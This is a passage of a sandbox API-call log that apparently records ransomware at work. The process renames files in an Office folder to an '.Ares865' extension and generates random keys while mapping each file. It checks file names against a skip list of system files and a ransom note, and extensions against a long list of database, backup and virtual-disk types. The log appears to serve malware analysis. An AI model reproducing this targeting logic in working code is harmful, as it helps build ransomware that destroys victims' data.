returned -1 [0085.691] lstrlenW (lpString="wrk") returned 3 [0085.692] lstrcmpiW (lpString1="ico", lpString2="wrk") returned -1 [0085.692] lstrlenW (lpString="xdb") returned 3 [0085.692] lstrcmpiW (lpString1="ico", lpString2="xdb") returned -1 [0085.692] lstrlenW (lpString="xld") returned 3 [0085.692] lstrcmpiW (lpString1="ico", lpString2="xld") returned -1 [0085.692] lstrlenW (lpString="xmlff") returned 5 [0085.692] lstrcmpiW (lpString1="y.ico", lpString2="xmlff") returned 1 [0085.692] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico.Ares865") returned 60 [0085.692] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\assetlibrary.ico"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\assetlibrary.ico.ares865"), dwFlags=0x1) returned 1 [0085.693] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\assetlibrary.ico.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.693] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5430) returned 1 [0085.693] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0085.694] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0085.694] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0085.694] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0085.694] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.694] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0085.695] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1840, lpName=0x0) returned 0x15c [0085.696] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1840) returned 0x190000 [0085.697] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0085.698] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.698] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0085.698] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0085.698] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0085.698] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0085.698] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0085.698] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0085.698] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0085.698] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0085.698] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0085.698] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0085.698] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0085.698] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0085.699] CloseHandle (hObject=0x15c) returned 1 [0085.699] CloseHandle (hObject=0x118) returned 1 [0085.699] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0085.699] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0085.699] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0085.699] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabeeea00, ftCreationTime.dwHighDateTime=0x1c63848, ftLastAccessTime.dwLowDateTime=0x51e19d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xabeeea00, ftLastWriteTime.dwHighDateTime=0x1c63848, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DocumentRepository.ico", cAlternateFileName="DOCUME~1.ICO")) returned 1 [0085.699] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.699] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="aoldtz.exe") returned 1 [0085.699] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2=".") returned 1 [0085.699] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="..") returned 1 [0085.699] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="windows") returned -1 [0085.699] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="bootmgr") returned 1 [0085.699] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="temp") returned -1 [0085.699] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="pagefile.sys") returned -1 [0085.699] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="boot") returned 1 [0085.699] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="ids.txt") returned -1 [0085.699] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="ntuser.dat") returned -1 [0085.699] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="perflogs") returned -1 [0085.699] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2="MSBuild") returned -1 [0085.699] lstrlenW (lpString="DocumentRepository.ico") returned 22 [0085.699] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\AssetLibrary.ico") returned 52 [0085.699] lstrcpyW (in: lpString1=0x2cce448, lpString2="DocumentRepository.ico" | out: lpString1="DocumentRepository.ico") returned="DocumentRepository.ico" [0085.699] lstrlenW (lpString="DocumentRepository.ico") returned 22 [0085.699] lstrlenW (lpString="Ares865") returned 7 [0085.699] lstrcmpiW (lpString1="ory.ico", lpString2="Ares865") returned 1 [0085.700] lstrlenW (lpString=".dll") returned 4 [0085.700] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2=".dll") returned 1 [0085.700] lstrlenW (lpString=".lnk") returned 4 [0085.700] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2=".lnk") returned 1 [0085.700] lstrlenW (lpString=".ini") returned 4 [0085.700] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2=".ini") returned 1 [0085.700] lstrlenW (lpString=".sys") returned 4 [0085.700] lstrcmpiW (lpString1="DocumentRepository.ico", lpString2=".sys") returned 1 [0085.700] lstrlenW (lpString="DocumentRepository.ico") returned 22 [0085.700] lstrlenW (lpString="bak") returned 3 [0085.700] lstrcmpiW (lpString1="ico", lpString2="bak") returned 1 [0085.700] lstrlenW (lpString="ba_") returned 3 [0085.700] lstrcmpiW (lpString1="ico", lpString2="ba_") returned 1 [0085.700] lstrlenW (lpString="dbb") returned 3 [0085.700] lstrcmpiW (lpString1="ico", lpString2="dbb") returned 1 [0085.700] lstrlenW (lpString="vmdk") returned 4 [0085.700] lstrcmpiW (lpString1=".ico", lpString2="vmdk") returned -1 [0085.700] lstrlenW (lpString="rar") returned 3 [0085.700] lstrcmpiW (lpString1="ico", lpString2="rar") returned -1 [0085.700] lstrlenW (lpString="zip") returned 3 [0085.700] lstrcmpiW (lpString1="ico", lpString2="zip") returned -1 [0085.700] lstrlenW (lpString="tgz") returned 3 [0085.700] lstrcmpiW (lpString1="ico", lpString2="tgz") returned -1 [0085.700] lstrlenW (lpString="vbox") returned 4 [0085.700] lstrcmpiW (lpString1=".ico", lpString2="vbox") returned -1 [0085.700] lstrlenW (lpString="vdi") returned 3 [0085.700] lstrcmpiW (lpString1="ico", lpString2="vdi") returned -1 [0085.700] lstrlenW (lpString="vhd") returned 3 [0085.700] lstrcmpiW (lpString1="ico", lpString2="vhd") returned -1 [0085.700] lstrlenW (lpString="vhdx") returned 4 [0085.700] lstrcmpiW (lpString1=".ico", lpString2="vhdx") returned -1 [0085.700] lstrlenW (lpString="avhd") returned 4 [0085.700] lstrcmpiW (lpString1=".ico", lpString2="avhd") returned -1 [0085.700] lstrlenW (lpString="db") returned 2 [0085.700] lstrcmpiW (lpString1="co", lpString2="db") returned -1 [0085.700] lstrlenW (lpString="db2") returned 3 [0085.700] lstrcmpiW (lpString1="ico", lpString2="db2") returned 1 [0085.700] lstrlenW (lpString="db3") returned 3 [0085.700] lstrcmpiW (lpString1="ico", lpString2="db3") returned 1 [0085.701] lstrlenW (lpString="dbf") returned 3 [0085.701] lstrcmpiW (lpString1="ico", lpString2="dbf") returned 1 [0085.701] lstrlenW (lpString="mdf") returned 3 [0085.701] lstrcmpiW (lpString1="ico", lpString2="mdf") returned -1 [0085.701] lstrlenW (lpString="mdb") returned 3 [0085.701] lstrcmpiW (lpString1="ico", lpString2="mdb") returned -1 [0085.701] lstrlenW (lpString="sql") returned 3 [0085.701] lstrcmpiW (lpString1="ico", lpString2="sql") returned -1 [0085.701] lstrlenW (lpString="sqlite") returned 6 [0085.701] lstrcmpiW (lpString1="ry.ico", lpString2="sqlite") returned -1 [0085.701] lstrlenW (lpString="sqlite3") returned 7 [0085.701] lstrcmpiW (lpString1="ory.ico", lpString2="sqlite3") returned -1 [0085.701] lstrlenW (lpString="sqlitedb") returned 8 [0085.701] lstrcmpiW (lpString1="tory.ico", lpString2="sqlitedb") returned 1 [0085.701] lstrlenW (lpString="xml") returned 3 [0085.701] lstrcmpiW (lpString1="ico", lpString2="xml") returned -1 [0085.701] lstrlenW (lpString="$er") returned 3 [0085.701] lstrcmpiW (lpString1="ico", lpString2="$er") returned 1 [0085.701] lstrlenW (lpString="4dd") returned 3 [0085.701] lstrcmpiW (lpString1="ico", lpString2="4dd") returned 1 [0085.701] lstrlenW (lpString="4dl") returned 3 [0085.701] lstrcmpiW (lpString1="ico", lpString2="4dl") returned 1 [0085.701] lstrlenW (lpString="^^^") returned 3 [0085.701] lstrcmpiW (lpString1="ico", lpString2="^^^") returned 1 [0085.701] lstrlenW (lpString="abs") returned 3 [0085.701] lstrcmpiW (lpString1="ico", lpString2="abs") returned 1 [0085.701] lstrlenW (lpString="abx") returned 3 [0085.701] lstrcmpiW (lpString1="ico", lpString2="abx") returned 1 [0085.701] lstrlenW (lpString="accdb") returned 5 [0085.701] lstrcmpiW (lpString1="y.ico", lpString2="accdb") returned 1 [0085.701] lstrlenW (lpString="accdc") returned 5 [0085.701] lstrcmpiW (lpString1="y.ico", lpString2="accdc") returned 1 [0085.701] lstrlenW (lpString="accde") returned 5 [0085.702] lstrcmpiW (lpString1="y.ico", lpString2="accde") returned 1 [0085.702] lstrlenW (lpString="accdr") returned 5 [0085.702] lstrcmpiW (lpString1="y.ico", lpString2="accdr") returned 1 [0085.702] lstrlenW (lpString="accdt") returned 5 [0085.702] lstrcmpiW (lpString1="y.ico", lpString2="accdt") returned 1 [0085.702] lstrlenW (lpString="accdw") returned 5 [0085.702] lstrcmpiW (lpString1="y.ico", lpString2="accdw") returned 1 [0085.702] lstrlenW (lpString="accft") returned 5 [0085.702] lstrcmpiW (lpString1="y.ico", lpString2="accft") returned 1 [0085.702] lstrlenW (lpString="adb") returned 3 [0085.702] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0085.702] lstrlenW (lpString="adb") returned 3 [0085.702] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0085.702] lstrlenW (lpString="ade") returned 3 [0085.702] lstrcmpiW (lpString1="ico", lpString2="ade") returned 1 [0085.702] lstrlenW (lpString="adf") returned 3 [0085.702] lstrcmpiW (lpString1="ico", lpString2="adf") returned 1 [0085.702] lstrlenW (lpString="adn") returned 3 [0085.702] lstrcmpiW (lpString1="ico", lpString2="adn") returned 1 [0085.702] lstrlenW (lpString="adp") returned 3 [0085.702] lstrcmpiW (lpString1="ico", lpString2="adp") returned 1 [0085.702] lstrlenW (lpString="alf") returned 3 [0085.702] lstrcmpiW (lpString1="ico", lpString2="alf") returned 1 [0085.702] lstrlenW (lpString="ask") returned 3 [0085.702] lstrcmpiW (lpString1="ico", lpString2="ask") returned 1 [0085.702] lstrlenW (lpString="btr") returned 3 [0085.702] lstrcmpiW (lpString1="ico", lpString2="btr") returned 1 [0085.702] lstrlenW (lpString="cat") returned 3 [0085.702] lstrcmpiW (lpString1="ico", lpString2="cat") returned 1 [0085.702] lstrlenW (lpString="cdb") returned 3 [0085.702] lstrcmpiW (lpString1="ico", lpString2="cdb") returned 1 [0085.702] lstrlenW (lpString="ckp") returned 3 [0085.703] lstrcmpiW (lpString1="ico", lpString2="ckp") returned 1 [0085.703] lstrlenW (lpString="cma") returned 3 [0085.703] lstrcmpiW (lpString1="ico", lpString2="cma") returned 1 [0085.703] lstrlenW (lpString="cpd") returned 3 [0085.703] lstrcmpiW (lpString1="ico", lpString2="cpd") returned 1 [0085.703] lstrlenW (lpString="dacpac") returned 6 [0085.703] lstrcmpiW (lpString1="ry.ico", lpString2="dacpac") returned 1 [0085.703] lstrlenW (lpString="dad") returned 3 [0085.703] lstrcmpiW (lpString1="ico", lpString2="dad") returned 1 [0085.703] lstrlenW (lpString="dadiagrams") returned 10 [0085.703] lstrcmpiW (lpString1="sitory.ico", lpString2="dadiagrams") returned 1 [0085.703] lstrlenW (lpString="daschema") returned 8 [0085.703] lstrcmpiW (lpString1="tory.ico", lpString2="daschema") returned 1 [0085.703] lstrlenW (lpString="db-journal") returned 10 [0085.703] lstrcmpiW (lpString1="sitory.ico", lpString2="db-journal") returned 1 [0085.703] lstrlenW (lpString="db-shm") returned 6 [0085.703] lstrcmpiW (lpString1="ry.ico", lpString2="db-shm") returned 1 [0085.703] lstrlenW (lpString="db-wal") returned 6 [0085.703] lstrcmpiW (lpString1="ry.ico", lpString2="db-wal") returned 1 [0085.703] lstrlenW (lpString="dbc") returned 3 [0085.703] lstrcmpiW (lpString1="ico", lpString2="dbc") returned 1 [0085.703] lstrlenW (lpString="dbs") returned 3 [0085.703] lstrcmpiW (lpString1="ico", lpString2="dbs") returned 1 [0085.703] lstrlenW (lpString="dbt") returned 3 [0085.703] lstrcmpiW (lpString1="ico", lpString2="dbt") returned 1 [0085.703] lstrlenW (lpString="dbv") returned 3 [0085.703] lstrcmpiW (lpString1="ico", lpString2="dbv") returned 1 [0085.703] lstrlenW (lpString="dbx") returned 3 [0085.703] lstrcmpiW (lpString1="ico", lpString2="dbx") returned 1 [0085.703] lstrlenW (lpString="dcb") returned 3 [0085.703] lstrcmpiW (lpString1="ico", lpString2="dcb") returned 1 [0085.703] lstrlenW (lpString="dct") returned 3 [0085.703] lstrcmpiW (lpString1="ico", lpString2="dct") returned 1 [0085.703] lstrlenW (lpString="dcx") returned 3 [0085.703] lstrcmpiW (lpString1="ico", lpString2="dcx") returned 1 [0085.703] lstrlenW (lpString="ddl") returned 3 [0085.703] lstrcmpiW (lpString1="ico", lpString2="ddl") returned 1 [0085.704] lstrlenW (lpString="dlis") returned 4 [0085.704] lstrcmpiW (lpString1=".ico", lpString2="dlis") returned -1 [0085.704] lstrlenW (lpString="dp1") returned 3 [0085.704] lstrcmpiW (lpString1="ico", lpString2="dp1") returned 1 [0085.704] lstrlenW (lpString="dqy") returned 3 [0085.704] lstrcmpiW (lpString1="ico", lpString2="dqy") returned 1 [0085.704] lstrlenW (lpString="dsk") returned 3 [0085.704] lstrcmpiW (lpString1="ico", lpString2="dsk") returned 1 [0085.704] lstrlenW (lpString="dsn") returned 3 [0085.704] lstrcmpiW (lpString1="ico", lpString2="dsn") returned 1 [0085.704] lstrlenW (lpString="dtsx") returned 4 [0085.704] lstrcmpiW (lpString1=".ico", lpString2="dtsx") returned -1 [0085.704] lstrlenW (lpString="dxl") returned 3 [0085.704] lstrcmpiW (lpString1="ico", lpString2="dxl") returned 1 [0085.704] lstrlenW (lpString="eco") returned 3 [0085.704] lstrcmpiW (lpString1="ico", lpString2="eco") returned 1 [0085.704] lstrlenW (lpString="ecx") returned 3 [0085.704] lstrcmpiW (lpString1="ico", lpString2="ecx") returned 1 [0085.704] lstrlenW (lpString="edb") returned 3 [0085.704] lstrcmpiW (lpString1="ico", lpString2="edb") returned 1 [0085.704] lstrlenW (lpString="epim") returned 4 [0085.704] lstrcmpiW (lpString1=".ico", lpString2="epim") returned -1 [0085.704] lstrlenW (lpString="fcd") returned 3 [0085.704] lstrcmpiW (lpString1="ico", lpString2="fcd") returned 1 [0085.704] lstrlenW (lpString="fdb") returned 3 [0085.704] lstrcmpiW (lpString1="ico", lpString2="fdb") returned 1 [0085.704] lstrlenW (lpString="fic") returned 3 [0085.704] lstrcmpiW (lpString1="ico", lpString2="fic") returned 1 [0085.704] lstrlenW (lpString="flexolibrary") returned 12 [0085.704] lstrcmpiW (lpString1="pository.ico", lpString2="flexolibrary") returned 1 [0085.704] lstrlenW (lpString="fm5") returned 3 [0085.704] lstrcmpiW (lpString1="ico", lpString2="fm5") returned 1 [0085.704] lstrlenW (lpString="fmp") returned 3 [0085.704] lstrcmpiW (lpString1="ico", lpString2="fmp") returned 1 [0085.704] lstrlenW (lpString="fmp12") returned 5 [0085.704] lstrcmpiW (lpString1="y.ico", lpString2="fmp12") returned 1 [0085.704] lstrlenW (lpString="fmpsl") returned 5 [0085.704] lstrcmpiW (lpString1="y.ico", lpString2="fmpsl") returned 1 [0085.705] lstrlenW (lpString="fol") returned 3 [0085.705] lstrcmpiW (lpString1="ico", lpString2="fol") returned 1 [0085.705] lstrlenW (lpString="fp3") returned 3 [0085.705] lstrcmpiW (lpString1="ico", lpString2="fp3") returned 1 [0085.705] lstrlenW (lpString="fp4") returned 3 [0085.705] lstrcmpiW (lpString1="ico", lpString2="fp4") returned 1 [0085.705] lstrlenW (lpString="fp5") returned 3 [0085.705] lstrcmpiW (lpString1="ico", lpString2="fp5") returned 1 [0085.705] lstrlenW (lpString="fp7") returned 3 [0085.705] lstrcmpiW (lpString1="ico", lpString2="fp7") returned 1 [0085.705] lstrlenW (lpString="fpt") returned 3 [0085.705] lstrcmpiW (lpString1="ico", lpString2="fpt") returned 1 [0085.705] lstrlenW (lpString="frm") returned 3 [0085.705] lstrcmpiW (lpString1="ico", lpString2="frm") returned 1 [0085.705] lstrlenW (lpString="gdb") returned 3 [0085.705] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0085.705] lstrlenW (lpString="gdb") returned 3 [0085.705] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0085.705] lstrlenW (lpString="grdb") returned 4 [0085.705] lstrcmpiW (lpString1=".ico", lpString2="grdb") returned -1 [0085.705] lstrlenW (lpString="gwi") returned 3 [0085.705] lstrcmpiW (lpString1="ico", lpString2="gwi") returned 1 [0085.705] lstrlenW (lpString="hdb") returned 3 [0085.705] lstrcmpiW (lpString1="ico", lpString2="hdb") returned 1 [0085.705] lstrlenW (lpString="his") returned 3 [0085.705] lstrcmpiW (lpString1="ico", lpString2="his") returned 1 [0085.705] lstrlenW (lpString="ib") returned 2 [0085.705] lstrcmpiW (lpString1="co", lpString2="ib") returned -1 [0085.705] lstrlenW (lpString="idb") returned 3 [0085.705] lstrcmpiW (lpString1="ico", lpString2="idb") returned -1 [0085.705] lstrlenW (lpString="ihx") returned 3 [0085.705] lstrcmpiW (lpString1="ico", lpString2="ihx") returned -1 [0085.705] lstrlenW (lpString="itdb") returned 4 [0085.705] lstrcmpiW (lpString1=".ico", lpString2="itdb") returned -1 [0085.705] lstrlenW (lpString="itw") returned 3 [0085.705] lstrcmpiW (lpString1="ico", lpString2="itw") returned -1 [0085.705] lstrlenW (lpString="jet") returned 3 [0085.705] lstrcmpiW (lpString1="ico", lpString2="jet") returned -1 [0085.706] lstrlenW (lpString="jtx") returned 3 [0085.706] lstrcmpiW (lpString1="ico", lpString2="jtx") returned -1 [0085.706] lstrlenW (lpString="kdb") returned 3 [0085.706] lstrcmpiW (lpString1="ico", lpString2="kdb") returned -1 [0085.706] lstrlenW (lpString="kexi") returned 4 [0085.706] lstrcmpiW (lpString1=".ico", lpString2="kexi") returned -1 [0085.706] lstrlenW (lpString="kexic") returned 5 [0085.706] lstrcmpiW (lpString1="y.ico", lpString2="kexic") returned 1 [0085.706] lstrlenW (lpString="kexis") returned 5 [0085.706] lstrcmpiW (lpString1="y.ico", lpString2="kexis") returned 1 [0085.706] lstrlenW (lpString="lgc") returned 3 [0085.706] lstrcmpiW (lpString1="ico", lpString2="lgc") returned -1 [0085.706] lstrlenW (lpString="lwx") returned 3 [0085.706] lstrcmpiW (lpString1="ico", lpString2="lwx") returned -1 [0085.706] lstrlenW (lpString="maf") returned 3 [0085.706] lstrcmpiW (lpString1="ico", lpString2="maf") returned -1 [0085.706] lstrlenW (lpString="maq") returned 3 [0085.706] lstrcmpiW (lpString1="ico", lpString2="maq") returned -1 [0085.706] lstrlenW (lpString="mar") returned 3 [0085.706] lstrcmpiW (lpString1="ico", lpString2="mar") returned -1 [0085.706] lstrlenW (lpString="marshal") returned 7 [0085.706] lstrcmpiW (lpString1="ory.ico", lpString2="marshal") returned 1 [0085.706] lstrlenW (lpString="mas") returned 3 [0085.706] lstrcmpiW (lpString1="ico", lpString2="mas") returned -1 [0085.706] lstrlenW (lpString="mav") returned 3 [0085.706] lstrcmpiW (lpString1="ico", lpString2="mav") returned -1 [0085.706] lstrlenW (lpString="maw") returned 3 [0085.706] lstrcmpiW (lpString1="ico", lpString2="maw") returned -1 [0085.706] lstrlenW (lpString="mdbhtml") returned 7 [0085.706] lstrcmpiW (lpString1="ory.ico", lpString2="mdbhtml") returned 1 [0085.706] lstrlenW (lpString="mdn") returned 3 [0085.706] lstrcmpiW (lpString1="ico", lpString2="mdn") returned -1 [0085.706] lstrlenW (lpString="mdt") returned 3 [0085.706] lstrcmpiW (lpString1="ico", lpString2="mdt") returned -1 [0085.706] lstrlenW (lpString="mfd") returned 3 [0085.706] lstrcmpiW (lpString1="ico", lpString2="mfd") returned -1 [0085.706] lstrlenW (lpString="mpd") returned 3 [0085.706] lstrcmpiW (lpString1="ico", lpString2="mpd") returned -1 [0085.707] lstrlenW (lpString="mrg") returned 3 [0085.707] lstrcmpiW (lpString1="ico", lpString2="mrg") returned -1 [0085.707] lstrlenW (lpString="mud") returned 3 [0085.707] lstrcmpiW (lpString1="ico", lpString2="mud") returned -1 [0085.707] lstrlenW (lpString="mwb") returned 3 [0085.707] lstrcmpiW (lpString1="ico", lpString2="mwb") returned -1 [0085.707] lstrlenW (lpString="myd") returned 3 [0085.707] lstrcmpiW (lpString1="ico", lpString2="myd") returned -1 [0085.707] lstrlenW (lpString="ndf") returned 3 [0085.707] lstrcmpiW (lpString1="ico", lpString2="ndf") returned -1 [0085.707] lstrlenW (lpString="nnt") returned 3 [0085.707] lstrcmpiW (lpString1="ico", lpString2="nnt") returned -1 [0085.707] lstrlenW (lpString="nrmlib") returned 6 [0085.707] lstrcmpiW (lpString1="ry.ico", lpString2="nrmlib") returned 1 [0085.707] lstrlenW (lpString="ns2") returned 3 [0085.707] lstrcmpiW (lpString1="ico", lpString2="ns2") returned -1 [0085.707] lstrlenW (lpString="ns3") returned 3 [0085.707] lstrcmpiW (lpString1="ico", lpString2="ns3") returned -1 [0085.707] lstrlenW (lpString="ns4") returned 3 [0085.707] lstrcmpiW (lpString1="ico", lpString2="ns4") returned -1 [0085.707] lstrlenW (lpString="nsf") returned 3 [0085.707] lstrcmpiW (lpString1="ico", lpString2="nsf") returned -1 [0085.707] lstrlenW (lpString="nv") returned 2 [0085.707] lstrcmpiW (lpString1="co", lpString2="nv") returned -1 [0085.707] lstrlenW (lpString="nv2") returned 3 [0085.707] lstrcmpiW (lpString1="ico", lpString2="nv2") returned -1 [0085.707] lstrlenW (lpString="nwdb") returned 4 [0085.707] lstrcmpiW (lpString1=".ico", lpString2="nwdb") returned -1 [0085.707] lstrlenW (lpString="nyf") returned 3 [0085.707] lstrcmpiW (lpString1="ico", lpString2="nyf") returned -1 [0085.707] lstrlenW (lpString="odb") returned 3 [0085.707] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0085.707] lstrlenW (lpString="odb") returned 3 [0085.707] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0085.707] lstrlenW (lpString="oqy") returned 3 [0085.707] lstrcmpiW (lpString1="ico", lpString2="oqy") returned -1 [0085.707] lstrlenW (lpString="ora") returned 3 [0085.707] lstrcmpiW (lpString1="ico", lpString2="ora") returned -1 [0085.708] lstrlenW (lpString="orx") returned 3 [0085.708] lstrcmpiW (lpString1="ico", lpString2="orx") returned -1 [0085.708] lstrlenW (lpString="owc") returned 3 [0085.708] lstrcmpiW (lpString1="ico", lpString2="owc") returned -1 [0085.708] lstrlenW (lpString="p96") returned 3 [0085.708] lstrcmpiW (lpString1="ico", lpString2="p96") returned -1 [0085.708] lstrlenW (lpString="p97") returned 3 [0085.708] lstrcmpiW (lpString1="ico", lpString2="p97") returned -1 [0085.708] lstrlenW (lpString="pan") returned 3 [0085.708] lstrcmpiW (lpString1="ico", lpString2="pan") returned -1 [0085.708] lstrlenW (lpString="pdb") returned 3 [0085.708] lstrcmpiW (lpString1="ico", lpString2="pdb") returned -1 [0085.708] lstrlenW (lpString="pdm") returned 3 [0085.708] lstrcmpiW (lpString1="ico", lpString2="pdm") returned -1 [0085.708] lstrlenW (lpString="pnz") returned 3 [0085.708] lstrcmpiW (lpString1="ico", lpString2="pnz") returned -1 [0085.708] lstrlenW (lpString="qry") returned 3 [0085.708] lstrcmpiW (lpString1="ico", lpString2="qry") returned -1 [0085.708] lstrlenW (lpString="qvd") returned 3 [0085.708] lstrcmpiW (lpString1="ico", lpString2="qvd") returned -1 [0085.708] lstrlenW (lpString="rbf") returned 3 [0085.708] lstrcmpiW (lpString1="ico", lpString2="rbf") returned -1 [0085.708] lstrlenW (lpString="rctd") returned 4 [0085.708] lstrcmpiW (lpString1=".ico", lpString2="rctd") returned -1 [0085.708] lstrlenW (lpString="rod") returned 3 [0085.708] lstrcmpiW (lpString1="ico", lpString2="rod") returned -1 [0085.708] lstrlenW (lpString="rodx") returned 4 [0085.708] lstrcmpiW (lpString1=".ico", lpString2="rodx") returned -1 [0085.708] lstrlenW (lpString="rpd") returned 3 [0085.708] lstrcmpiW (lpString1="ico", lpString2="rpd") returned -1 [0085.708] lstrlenW (lpString="rsd") returned 3 [0085.708] lstrcmpiW (lpString1="ico", lpString2="rsd") returned -1 [0085.708] lstrlenW (lpString="sas7bdat") returned 8 [0085.708] lstrcmpiW (lpString1="tory.ico", lpString2="sas7bdat") returned 1 [0085.708] lstrlenW (lpString="sbf") returned 3 [0085.708] lstrcmpiW (lpString1="ico", lpString2="sbf") returned -1 [0085.708] lstrlenW (lpString="scx") returned 3 [0085.708] lstrcmpiW (lpString1="ico", lpString2="scx") returned -1 [0085.709] lstrlenW (lpString="sdb") returned 3 [0085.709] lstrcmpiW (lpString1="ico", lpString2="sdb") returned -1 [0085.709] lstrlenW (lpString="sdc") returned 3 [0085.709] lstrcmpiW (lpString1="ico", lpString2="sdc") returned -1 [0085.709] lstrlenW (lpString="sdf") returned 3 [0085.709] lstrcmpiW (lpString1="ico", lpString2="sdf") returned -1 [0085.709] lstrlenW (lpString="sis") returned 3 [0085.709] lstrcmpiW (lpString1="ico", lpString2="sis") returned -1 [0085.709] lstrlenW (lpString="spq") returned 3 [0085.709] lstrcmpiW (lpString1="ico", lpString2="spq") returned -1 [0085.709] lstrlenW (lpString="te") returned 2 [0085.709] lstrcmpiW (lpString1="co", lpString2="te") returned -1 [0085.709] lstrlenW (lpString="teacher") returned 7 [0085.709] lstrcmpiW (lpString1="ory.ico", lpString2="teacher") returned -1 [0085.709] lstrlenW (lpString="tmd") returned 3 [0085.709] lstrcmpiW (lpString1="ico", lpString2="tmd") returned -1 [0085.709] lstrlenW (lpString="tps") returned 3 [0085.709] lstrcmpiW (lpString1="ico", lpString2="tps") returned -1 [0085.709] lstrlenW (lpString="trc") returned 3 [0085.709] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0085.709] lstrlenW (lpString="trc") returned 3 [0085.709] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0085.709] lstrlenW (lpString="trm") returned 3 [0085.709] lstrcmpiW (lpString1="ico", lpString2="trm") returned -1 